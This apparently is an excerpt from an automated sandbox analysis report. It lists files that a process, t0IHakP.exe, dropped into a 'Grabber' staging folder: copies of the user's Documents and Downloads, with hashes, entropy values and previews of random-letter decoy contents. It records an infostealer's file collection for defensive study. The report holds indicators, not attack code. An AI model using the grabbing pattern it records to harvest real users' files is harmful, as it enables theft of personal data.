Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Documents\XQACHMZIHU.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Documents\XQACHMZIHU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Documents\XQACHMZIHU\AFWAAFRXKO.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	false
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Documents\XQACHMZIHU\NHPKIZUUSG.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.70435191336402
Encrypted:	false
SSDEEP:	24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
MD5:	8C1F71001ABC7FCE68B3F15299553CE7
SHA1:	382285FB69081EB79C936BC4E1BFFC9D4697D881
SHA-256:	DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
SHA-512:	8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
Malicious:	false
Preview:	NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Documents\XQACHMZIHU\QVTVNIBKSD.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695938097013837
Encrypted:	false
SSDEEP:	24:z3kwMX3+NBj4ilMczAMBVgs3WrV8bfMbETQzpns7vh2HCpPQ:bkww3UGiJyGWr3RMvh2HC9Q
MD5:	DC3E834A02B2C81DF0167ACE639BA00F
SHA1:	32859A24EE65CBB3BD804D02639FCC4745C1CBC9
SHA-256:	0034D483C5EB801444D442E100E6B97859FB3752243C3323578F94083F469A29
SHA-512:	CA0BEDA568B13F4522ABFCBD8E73CD96AEEF991C8896E5C9F03D999722498840CFF29265340F8D86267E8E134085300FF8D42EC5E4741229332DEAD4B30E6D0F
Malicious:	false
Preview:	QVTVNIBKSDCTAQBGAOXCDNDJJSYXWJGWLNQZGTIRDPOXBJKWLQKQGHTGEEYZCSQXRIHLQYWVXDHEUMWEKWFGJLMYICQYBHNEZJWDJOGRRNRTOYBVHVOADCWLJBCJDEJQGWHIISDSHGZRWITARTFGZLYVQWZDXCBALJESXBFEMTGTIZQWIKXFTDQGTAMDONWUIJUYOKJXLUTMOCIHGFKUVWTZWGGDCWXLKJNCFYDCGKWQMLFWZQSHHWIEETWTGXVBHMSPQQUETSKWPAJFMRFRCHDNYKBAAHPLMJRBBAJTVLLAUUCLJYJMJLBKQGNTWGMPYQTUPYRFGMYPSFAZKFDAZPZSDSLLFCSCKJNYWUFBZSQQHSKWDGIBILREFDZJQVIODCTVEDOBTVFRFOHJOUFGKJWSBYWFYBYTUGQGTLYPZCUIXPOJLCNPDOVBXWCGCWSAJJFYOSWSVKPATDKQJRADERJVQVTQESFPSXRVBVEDLVTQYWXVFAKVPURCBYBIAPAQUFQNNEYDRUYBOOCMWAVFRHNFPGDIUCRWCXKMXPIRSBECJROTFLGGLOLFKFRGHTSAIKSQPSZXJDXWBHZHVBFILAACTJHJEQBYDONPYTGLNXEZPFCIDHTTHGIOFCTFHRHIJGRCZPVJAOXIBAJIEMVNELYPQKBHQECWJYTAPCZMZNVFUTOKDAKOXRQKSDSHHXCNPTOQACAKMZSIGEKSTZYQWWAIYNMYZGDCJITHDWZHQWHGDAHXUUSQNHSEWLINMAVJEJLBWIZQNZHARGRNBGZEQKQKZKRPFIWNXAVGMLKQJEJDYBDRSHJBULSDTLIKLIFONGYGERWNAHSKLLHMDBCSSWVOEIGUACWQMNZYBQMRIYIQZQOYRZUOCZWOMBFRIJMVRKAWJHTMEMGVQYWBBMYZGCFTJKRLDPFOIYFDWQUEGJXKLKIPLVLNTFZCDKJMEKYNPPGPMXAGDHXGEVWCGIHPFBAPAKCGGKURXQFPUIQV

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Documents\XQACHMZIHU\XQACHMZIHU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Documents\XQACHMZIHU\XZXHAVGRAG.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Documents\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	402
Entropy (8bit):	3.493087299556618
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
MD5:	ECF88F261853FE08D58E2E903220DA14
SHA1:	F72807A9E081906654AE196605E681D5938A2E6C
SHA-256:	CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
SHA-512:	82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Downloads\AFWAAFRXKO.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	false
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQP